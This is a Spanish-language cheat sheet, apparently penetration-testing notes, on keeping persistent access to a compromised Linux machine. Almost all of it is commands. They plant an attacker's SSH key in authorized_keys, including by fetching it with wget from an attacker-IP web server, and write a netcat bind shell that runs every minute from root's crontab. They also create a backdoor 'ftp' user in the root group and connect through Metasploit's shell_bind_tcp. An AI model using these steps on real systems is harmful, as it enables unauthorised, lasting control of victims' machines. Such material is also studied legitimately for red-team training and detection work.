Obteniendo Persistencia en Linux

Malicious SSH Key [ con credenciales ]

Generación de par de claves

**ssh-keygen** -t rsa -b 4096

*# En caso de que se solicite una contraseña tenemos la opción de dejarlo en blanco*

Tranferencia de la clave pública al usuario comprometido

**ssh-copy-id** *<victim-user>***@***<target-ip-or-hostname>

# Se solicitará la contraseña del usuario*

Conexión con SSH

**ssh** *<victim-user>***@***<target-ip-or-hostname>*

Malicious SSH Key [ sin credenciales ]

Generación de par de claves

**ssh-keygen** -t rsa -b 4096

*# En caso de que se solicite una contraseña tenemos la opción de dejarlo en blanco*

Inicialización de servidor Python

**cd** ~/.ssh/
**
**python3** -m http.server 80

*# Alternativa con Python2.7*
**python2** -m SimpleHTTPServer 80

Descargar archivo [ máquina atacante ]

**wget** http://*<attacker-ip>/id_rsa.pub*

**cat** *id_rsa.pub >> .ssh/authorized_keys*

Malicious Crontab

Creación de bindshell

**echo** 'nc -lkvnp 4443 -e /bin/bash >/dev/null &' > /tmp/bindshell

Creación de crontab maliciosa

**echo '*** * * * * /tmp/bindshell' | sudo tee -a /var/spool/cron/crontabs/root

New User

Creación de nuevo usuario

**adduser** -m ****user -s /bin/bash **ftp**

Cambio de contraseña

**passwd** ftp

Agregar el usuario a grupo root

**usermod** -aG root **ftp**

Extra

Obteniendo conexión con Bindshell

**use** payload/generic/shell_bind_tcp

**set** RHOST <target-ip>

**set** LPORT <local-port>

**exploit**

Obteniendo conexión con Bindshell

*# CTRL + Z o escribe 'background' para poner la sesión previamente obtenida en segundo plano*

**sessions** -l
**
**sessions** -u <session-id>

**sessions** <session-id>